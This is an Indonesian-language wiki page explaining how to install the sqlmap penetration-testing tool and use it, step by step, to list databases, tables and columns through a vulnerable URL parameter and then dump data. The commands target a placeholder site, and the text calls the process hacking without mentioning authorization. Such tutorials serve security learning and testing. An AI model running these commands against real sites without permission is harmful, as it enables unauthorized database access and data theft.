Jump to content

SQLMAP

From Wiki

SQLMAP adalah alat pengujian penetrasi open source yang mengotomatiskan proses mendeteksi dan mengeksploitasi kelemahan injeksi SQL dan mengambil alih server database. Ini adalah alat open source untuk menggunakan injeksi sql dengan cara yang lebih baik dan lebih sederhana.

Ini sudah diinstal sebelumnya pada Sistem Operasi KALI LINUX.

Installasi

wget 'https://github.com/sqlmapproject/sqlmap/tarball/master' --output-document=sqlmap.tar.gz

tar -xvf sqlmap.tar.gz

cd sqlmapproject-sqlmap-c4f9e66/

python sqlmap.py --version
  • Atau bisa menggunakana perintah berikut
sudo apt install sqlmap

Usage

  • Buka direktori sqlmap Anda dan Jalankan perintah ini untuk menguji perintah sql.
  • Dimana
-u :- artinya url yang akan kita hack
–dbs :- perintah akan menampilkan daftar database yang dapat diretas.

Ubuntu

./sqlmap.py -u http://www.example.com/about.php?id=1 --dbs

Kali Linux

sqlmap -u http://www.example.com/about.php?id=1 --dbs
  • Sekarang retas tabel database yang diretas.
  • Dimana
-D :- berarti nama database yang akan Anda retas
–tabel :- perintah akan menampilkan semua tabel database yang diretas.

Ubuntu

./sqlmap.py -u http://www.example.com/about.php?id=1 --dbs -D exampledb --tables

Kali Linux

sqlmap -u http://www.example.com/about.php?id=1 --dbs -D exampledb --tables
  • Tugas selanjutnya adalah mengambil kolom dari tabel apa pun.
  • Dimana
-T :- artinya Nama tabel yang akan diretas
–columns :- perintah akan menampilkan semua kolom tabel.

Ubuntu

./sqlmap.py -u http://www.example.com/about.php?id=1 --dbs -D exampledb --tables -T apllied_items --columns

Kali Linux

sqlmap -u http://www.example.com/about.php?id=1 --dbs -D exampledb --tables -T apllied_items --columns
  • Sekarang ini adalah tugas terakhir Anda mengambil data nyata dari tabel.
  • Dimana
-C :- artinya nama Kolom tabel.
–dump :- perintah akan menampilkan semua data dari kolom yang diberikan.

Ubuntu

./sqlmap.py -u http://www.example.com/about.php?id=1 --dbs -D exampledb --tables -T apllied_items --columns -C menuid --dump

Kali Linux

sqlmap -u http://www.example.com/about.php?id=1 --dbs -D exampledb --tables -T apllied_items --columns -C menuid --dump
Retrieved from "https://kangtain.com/wiki/index.php?title=SQLMAP&oldid=9056"